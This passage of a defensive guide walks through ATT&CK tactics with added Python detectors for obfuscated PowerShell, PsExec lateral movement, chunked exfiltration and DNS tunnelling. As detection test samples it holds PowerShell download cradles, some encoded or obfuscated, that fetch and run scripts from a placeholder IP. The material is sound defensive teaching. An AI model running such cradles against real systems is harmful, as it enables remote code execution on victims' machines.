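    texts = [ENC_RE.sub("-enc <blob>", cmdline)]
    if decoded:
        texts.append(decoded)
    for text in texts:
        for pattern, name, weight in INDICATORS:
            if name not in hits and re.search(pattern, text, re.I):
                hits.append(name)
                total += weight
    return total, hits, decoded


def verdict(cmdline: str) -> str:
    """'alert' at or above the threshold, 'review' for a weak signal, else 'none'."""
    total = score(cmdline)[0]
    return "alert" if total >= ALERT_THRESHOLD else ("review" if total else "none")


# Constructed sample command lines (not real telemetry).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
SAMPLE_CMDLINES = [
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1",
    "powershell.exe -nop -w hidden -enc " + build_encoded(CRADLE),
    "powershell.exe -noni -c \"&('I'+'EX') ((New-Object Net.WebClient).DownloadString('http://203.0.113.10/b'))\"",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        total, hits, decoded = score(c)
        print(f"{verdict(c):6} {total:2} {hits} decoded={decoded!r}")
```

The third sample shows why the decode step is not enough on its own: 'I'+'EX' never spells IEX anywhere in the telemetry, so the concatenation and cradle indicators carry it over the threshold instead. Script block logging (Event ID 4104) closes that gap by recording the block after PowerShell has assembled it, so the same scorer run over 4104 text sees the plain Invoke-Expression.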
More Information
For more information on Defense Evasion, refer to:
https://attack.mitre.org/tactics/TA0005/
Credential Access
Credential Access consists of techniques for stealing credentials like account names and passwords. Techniques used to get credentials include keylogging or credential dumping. Using legitimate credentials can give adversaries access to systems, make them harder to detect, and provide the opportunity to create more accounts to help achieve their goals.
Detection and prevention methods for credential access are very similar to those covered in the Privilege Escalation section.
More Information
https://attack.mitre.org/tactics/TA0006/
Discovery
Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.
Detecting Discovery Tactics
When detecting discovery tactics, you will often see Active Directory (AD) user and Organizational Unit (OU) dumps, query commands on hosts, files or directories, network scans or sniffs, etc. Discovery activity often looks very similar in logs to what your own team does during the reconnaissance phase. This makes it very important to know your own source IPs when running scans, because analysts will mistake our own reconnaissance tools for the adversary if they are unaware of their own IP space.
Preventing Discovery Tactics
Preventing attackers from using discovery tactics is not always easy. Simple query commands that anyone can run are used during this phase of an attack. Ensure that file shares are locked down and that any network diagrams are password protected. In the event that an adversary has gained access and you see them conducting discovery, it is sometimes best to observe them and see which files they are trying to access. We will talk more about methodology for removing adversaries from the network later, but know now that it is better to gather all of the evidence and eliminate the enemy completely rather than play whack-a-mole.
More Information
For more information regarding Discovery tactics, refer to:
https://attack.mitre.org/tactics/TA0007/
Lateral Movement
Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it, which usually involves pivoting through multiple systems and accounts. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.
Methods of Lateral Movement and How to Detect Them
There are several ways to accomplish lateral movement. Some of the most common methods are PsExec, Windows Remote Management (WinRM), and WMI.
PsExec to Achieve Lateral Movement  
PsExec comes from Microsoft's Sysinternals suite and lets an administrator run commands and processes on remote hosts over Server Message Block (SMB, TCP 445) using named pipes. The adversary first connects to the ADMIN$ share on the target over SMB and uploads PSEXESVC.exe. They then use the Service Control Manager to install and start the PSEXESVC service, which creates named pipes on the remote system for the session's standard input, output and error.
This can be detected by monitoring for remote service creation using the well-known "PSEXESVC" name (System log):
EventCode==7045 AND ("Service Name" CONTAINS "PSEXESVC")
If telemetry is available, the optimal solution is to monitor for the uniquely-named pipes created on the target as part of the process (Security log; requires the Audit Detailed File Share subcategory):
EventCode==5145 AND ("Relative Target Name" CONTAINS ("*-stdin" OR "*-stdout" OR "*-stderr"))
Finally, a change to the EULA registry key, which PsExec writes on the host it is run from rather than on the target, could be a useful addition to any of the above (Sysmon):
EventCode==13 AND ("TargetObject" CONTAINS "*software\sysinternals\psexec\eulaaccepted")
Note that the operator can rename the service with PsExec's -r switch, so the pipe and registry rules catch cases the service-name rule misses.
Proper whitelisting and baselining are critical to identifying anomalous and potentially malicious activity. Sysinternals PsExec is a legitimate systems administration utility and may be used as such day-to-day in an environment. Some legitimate monitoring solutions, vulnerability scanners, or asset management systems might also exhibit this activity pattern. Knowing your allow lists and baseline profile can help differentiate between common benign activity and potentially malicious behavior.
Additional Windows event IDs that can assist in detecting lateral movement over PsExec include Security Event ID 4697 (a service was installed in the system), 4624 (successful logon; PsExec produces a network logon, type 3, from the source host), and System Event ID 7045 (a service was installed in the system, logged by the Service Control Manager).
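The three rules above, applied to constructed events and correlated per host, as an added example for this guide (not code from the original text). A host that shows both a PSEXESVC service install and the stdin/stdout pipes is rated high; a host touched only by an allow-listed source (the "legitimate vulnerability scanner" case the text describes) is rated baseline; and the EULA key alone is rated for review, since it marks the machine PsExec was run from, not a target. The event records use the field names those events expose, but are constructed, and the allow-listed scanner address is an assumption.

```python
"""Apply the three PsExec rules to constructed events and correlate them per
host, suppressing sources that are on the PsExec allow list.

Added example, not from the original guide. The events are constructed with
the field names those Windows/Sysmon events expose; the allow-listed scanner
address is an assumption standing in for the baseline the text describes.
"""
import re
from collections import defaultdict

PIPE_RE = re.compile(r"-(stdin|stdout|stderr)$", re.I)
EULA_RE = re.compile(r"software\\sysinternals\\psexec\\eulaaccepted$", re.I)
# Assumed: a vulnerability scanner that legitimately uses PsExec against hosts.
ALLOWED_SOURCES = {"10.0.0.5"}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    {"host": "WS01", "id": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "WS01", "id": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "PSEXESVC-OPS-4321-stdin",
     "IpAddress": "10.0.0.77", "SubjectUserName": "jdoe"},
    {"host": "WS01", "id": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "PSEXESVC-OPS-4321-stdout",
     "IpAddress": "10.0.0.77", "SubjectUserName": "jdoe"},
    {"host": "WS02", "id": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"host": "WS02", "id": 5145, "ShareName": r"\\*\IPC$", "RelativeTargetName": "PSEXESVC-SCANNER-100-stdin",
     "IpAddress": "10.0.0.5", "SubjectUserName": "svc_scan"},
    {"host": "WS03", "id": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Sysinternals\PsExec\EulaAccepted",
     "Details": "DWORD (0x00000001)"},
    {"host": "WS04", "id": 5145, "ShareName": r"\\*\C$", "RelativeTargetName": r"Users\jdoe\report.docx",
     "IpAddress": "10.0.0.9", "SubjectUserName": "jdoe"},
]


def match_rule(ev: dict):
    """Name of the rule the event trips, or None."""
    if ev["id"] == 7045 and "PSEXESVC" in ev.get("ServiceName", "").upper():
        return "service_install"
    if ev["id"] == 5145 and PIPE_RE.search(ev.get("RelativeTargetName", "")):
        return "named_pipe"
    if ev["id"] == 13 and EULA_RE.search(ev.get("TargetObject", "")):
        return "eula_key"     # fires on the machine PsExec was run FROM
    return None


def correlate(events, allowed_sources=ALLOWED_SOURCES):
    """Per host: verdict, rules tripped, source addresses and accounts seen on the pipes."""
    per_host = defaultdict(lambda: {"rules": set(), "sources": set(), "users": set()})
    for ev in events:
        rule = match_rule(ev)
        if rule is None:
            continue
        entry = per_host[ev["host"]]
        entry["rules"].add(rule)
        if ev.get("IpAddress"):
            entry["sources"].add(ev["IpAddress"])
        if ev.get("SubjectUserName"):
            entry["users"].add(ev["SubjectUserName"])
    results = {}
    for host, entry in per_host.items():
        if entry["sources"] and entry["sources"] <= allowed_sources:
            verdict = "baseline"   # only the known scanner touched this host
        elif len(entry["rules"]) >= 2:
            verdict = "high"       # service install AND pipes: PsExec really ran here
        else:
            verdict = "review"
        results[host] = (verdict, sorted(entry["rules"]), sorted(entry["sources"]), sorted(entry["users"]))
    return results


if __name__ == "__main__":
    for host, (verdict, rules, sources, users) in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {verdict} rules={rules} sources={sources} users={users}")
```

The source address and account come from the 5145 pipe events, which is why they are the most useful of the three rules: they tell you where to pivot next, while 7045 only tells you that something was installed.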
Windows Remote Management (WinRM) to Achieve Lateral Movement
WinRM (Windows Remote Management) is Microsoft's implementation of WS-Management in Windows, which allows systems to access or exchange management information across a common network. Unlike traditional web traffic, it does not use ports 80/443 but instead 5985 (HTTP) and 5986 (HTTPS). Windows Remote Management allows commands to be sent to remote Windows computers over HTTP or HTTPS by leveraging the Web Services for Management protocol. WinRM runs as a service under the Network Service account, and because it and its client tools are native Microsoft components, their use will bypass many whitelisting solutions, providing another attractive option for attackers. The Windows Remote Shell command, winrs, allows the execution of arbitrary commands on remote systems. On the target, a WinRM session appears as a network logon (Security Event ID 4624, logon type 3) followed by processes spawned from wsmprovhost.exe, which is the parent to look for in Sysmon process-creation events.
Windows Management Instrumentation (WMI) to Achieve Lateral Movement
Windows Management Instrumentation (WMI) is built into Windows to allow remote access to Windows components via the WMI service. It communicates using Remote Procedure Calls (RPC) over port 135 for the initial connection (and a dynamically assigned high port afterwards) and lets system administrators perform administrative tasks remotely, e.g. starting a service or executing a command. Adversaries can drive it directly with wmic.exe (for example, wmic /node:<host> process call create) or through PowerShell.
Sysmon event IDs 19 (WmiEventFilter activity detected), 20 (WmiEventConsumer activity detected), and 21 (WmiEventConsumerToFilter activity detected) record WMI event subscriptions, which is the persistence use of WMI rather than remote execution. For WMI-based lateral movement, look instead for processes spawned by WmiPrvSE.exe on the target (Sysmon Event ID 1 with WmiPrvSE.exe as the parent) paired with a network logon (Security Event ID 4624, logon type 3) from the source host.
Preventing Lateral Movement
Ensure that administrators use their regular, non-privileged user accounts whenever possible and reserve administrative accounts for administrative tasks. Apply the principle of least privilege. Two-factor authentication should be used whenever possible. Prevent attackers from using tools to assist in lateral movement by implementing application whitelisting. Segmenting the network is always one of the strongest recommendations to prevent Lateral Movement, but understand that Marine Corps networks will almost always be a flat domain.
Additional methods of mitigating lateral movement techniques include:
- Implementing a simple three-tiered administration model (Workstations, General Servers, Authentication Servers)
-Denying logon for security principals in the wrong tier
-Denying all SMB communication between workstations
-Denying most SMB communication from workstations to servers
-Prioritizing Operating System upgrades for ‘high-risk’ servers
-Deploying Windows Defender Code Integrity rules
-Deploying Windows Defender Attack Surface Reduction rules
-Denying network logon for security principals likely to be used for adversary lateral movement
-Denying 'log on as a service' for administrative accounts
-Windows Token filtering policies
-Improved Service Control Manager ACLs
-WMI access restrictions
-Advanced Windows Firewall configurations for all SMB traffic, using IPsec (null encryption) so that only authenticated hosts can connect
-Network-based tiering restrictions on a per-service level
-Windows Firewall built in Named Pipe rules
More Information
For more information regarding Lateral Movement, refer to:
https://attack.mitre.org/tactics/TA0008/
https://www.beyondtrust.com/blog/entry/10-steps-stop-lateral-movement-data-breaches
Collection and Exfiltration
Collection consists of the techniques adversaries use to gather information, and the sources that information is collected from, that are relevant to following through on the adversary's objectives. Frequently, the next goal after collecting data is to steal (exfiltrate) it. Common target sources include various drive types, browsers, audio, video, and email. Common collection methods include capturing screenshots and keyboard input.
Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.
Detecting Collection and Exfiltration
An adversary may exfiltrate data in fixed-size chunks instead of whole files, or limit packet sizes to stay below certain thresholds. This approach is used to avoid triggering network data transfer threshold alerts, but you may still see a spike in data volume on your sensors.
Another indicator is a user pulling data from a file share that they have no role or reason to access.
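The chunking behaviour described above leaves a recognisable shape in flow records: many outbound flows of exactly the same size from one host to one external destination. The rule below, an added example that is not part of the original document, looks for that shape; the hosts, destination addresses and byte counts are constructed, and the internal ranges are assumed to be the RFC 1918 networks.

```python
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

# Constructed flow records (hypothetical hosts; the 203.0.113.0/24 and
# 198.51.100.0/24 documentation ranges stand in for Internet destinations).
SAMPLE_FLOWS = (
    [{"src": "10.1.5.23", "dst": "203.0.113.10", "bytes": 4096} for _ in range(12)]
    + [{"src": "10.1.5.23", "dst": "203.0.113.10", "bytes": 512}]       # final partial chunk
    + [{"src": "10.1.5.40", "dst": "198.51.100.7", "bytes": b}           # ordinary browsing
       for b in (1440, 3900, 870, 12000, 640, 2210, 5005, 990)]
    + [{"src": "10.1.5.23", "dst": "10.1.5.200", "bytes": 4096} for _ in range(10)]  # internal share
)

# Assumed internal address space: RFC 1918 ranges (adjust to your enclave).
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_internal(ip):
    return any(ip_address(ip) in net for net in INTERNAL_NETS)

def detect_chunked_egress(flows, min_flows=8, uniform_ratio=0.8):
    """Flag (src, dst) pairs whose outbound flows are dominated by one exact
    size: repeated equal-sized transfers to a single external host are the
    shape produced by exfiltration in fixed-size chunks. Internal destinations
    are skipped so that normal file-share traffic does not trip the rule."""
    sizes_by_pair = defaultdict(list)
    for f in flows:
        if is_internal(f["dst"]):
            continue
        sizes_by_pair[(f["src"], f["dst"])].append(f["bytes"])
    alerts = []
    for (src, dst), sizes in sizes_by_pair.items():
        if len(sizes) < min_flows:
            continue
        chunk, n = Counter(sizes).most_common(1)[0]
        if n / len(sizes) >= uniform_ratio:
            alerts.append({"src": src, "dst": dst, "chunk_bytes": chunk,
                           "chunk_flows": n, "total_bytes": sum(sizes)})
    return alerts
```

The total_bytes field is what shows up as the volume spike on the sensor, while chunk_bytes and chunk_flows are what distinguish chunked exfiltration from a single large upload.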
Prevention or Remediation of Collection and Exfiltration
The best way to mitigate collection or exfiltration of files is to ensure that your files are locked down and that least-privilege access policies are applied to them.
More Information
For more information on Collection and Exfiltration, refer to:
https://attack.mitre.org/tactics/TA0009/
https://attack.mitre.org/tactics/TA0010/
Command and Control (C2)
Command and Control (C2) consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.
Detecting Command and Control
Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Adversaries may obfuscate command and control traffic to make it more difficult to detect. C2 communications are hidden (but not necessarily encrypted) so that the content is harder to discover or decipher, the communication is less conspicuous, and the commands themselves are not visible. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
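When commands and results are embedded in DNS, as described above, the query names carry the data, so lookups against one domain show long, high-entropy leftmost labels that never repeat. The analysis below, an added example that is not part of the original document, scores DNS query log lines on exactly that; the clients, the domain and the log format ("time client qname qtype") are constructed, and the registered-domain split is simplified to the last two labels.

```python
import hashlib
import math
from collections import Counter, defaultdict

# Constructed DNS query log (hypothetical clients, domain and timestamps), one
# "time client qname qtype" record per line, generated deterministically so the
# example runs offline.
def _constructed_log():
    lines = []
    for i in range(30):   # lookups whose leftmost label is a long hex string
        label = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:32]
        lines.append(f"10:{i:02d}:00 10.1.5.23 {label}.cdn-sync.example.test TXT")
    for i in range(25):   # ordinary browsing lookups from another client
        host = ("www", "mail", "cdn", "api")[i % 4]
        lines.append(f"10:{i:02d}:30 10.1.5.40 {host}.example.test A")
    return lines

SAMPLE_LOG = _constructed_log()

def shannon_entropy(s):
    """Bits of entropy per character; random hex text scores close to 4.0."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def registered_domain(qname):
    # Simplified: last two labels (a production tool would use the public suffix list).
    return ".".join(qname.rstrip(".").split(".")[-2:])

def find_dns_tunnel_candidates(lines, min_queries=20, min_label_len=16,
                               min_entropy=3.0, min_ratio=0.8):
    """Flag (client, domain) pairs where most lookups carry a long, high-entropy
    leftmost label, the shape left by data embedded in query names."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "suspicious": 0})
    for line in lines:
        _ts, client, qname, _qtype = line.split()
        dom = registered_domain(qname)
        sub = qname[: -len(dom) - 1] if len(qname) > len(dom) else ""
        s = stats[(client, dom)]
        s["queries"] += 1
        if sub:
            s["subs"].add(sub)
            first = sub.split(".")[0]
            if len(first) >= min_label_len and shannon_entropy(first) >= min_entropy:
                s["suspicious"] += 1
    alerts = []
    for (client, dom), s in stats.items():
        if s["queries"] >= min_queries and s["suspicious"] / s["queries"] >= min_ratio:
            alerts.append({"client": client, "domain": dom, "queries": s["queries"],
                           "unique_subdomains": len(s["subs"])})
    return alerts
```

Legitimate CDNs and some security products also generate long encoded labels, so treat a hit as a lead for the beacon checks in the next section rather than as proof on its own.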
Preventing and Remedial Actions for Command and Control
Consider filtering DNS requests to unknown, untrusted, or known-bad domains and resources. Resolving DNS requests through on-premises or proxy resolvers may also disrupt adversary attempts to conceal data within DNS packets. If you see a host beaconing out to an unknown or potentially malicious domain, ensure that the domain and its IP address are blocked where possible, and consider isolating that host until you can determine what is causing the beacon.
More Information
For more information regarding C2, refer to:
https://attack.mitre.org/tactics/TA0011/
Impact
Impact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact can include destroying or tampering with data. In some cases, business processes can look fine but may have been altered to benefit the adversaries’ goals. These techniques might be used by adversaries as a distraction to follow through on their end goal or to provide cover for a confidentiality breach.
Detecting Impact
This will be fairly obvious when it happens. Typically an adversary on the network wants to be as quiet as possible but this tactic will be loud and hard to miss. Understand that this tactic is typically used to impose costs on your team and distract them from another objective.
Remedial Actions for Impact
As discussed, this tactic is often used to impose costs on your team and draw them away from the real target. It is imperative that you task the LNOs appropriately in fixing the problem to allow you to focus on detecting other issues.
More Information
For more information on Impact, refer to: